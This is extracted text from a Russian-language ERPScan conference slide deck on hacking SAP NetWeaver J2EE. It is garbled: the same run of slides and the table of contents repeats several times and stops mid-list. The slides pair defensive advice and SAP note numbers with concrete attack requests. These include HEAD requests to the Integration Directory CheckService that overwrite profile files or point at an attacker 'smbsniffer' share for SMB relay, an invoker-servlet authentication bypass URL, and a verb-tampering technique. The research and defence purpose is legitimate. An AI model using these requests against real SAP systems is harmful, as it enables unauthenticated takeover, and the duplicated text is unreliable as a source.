14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
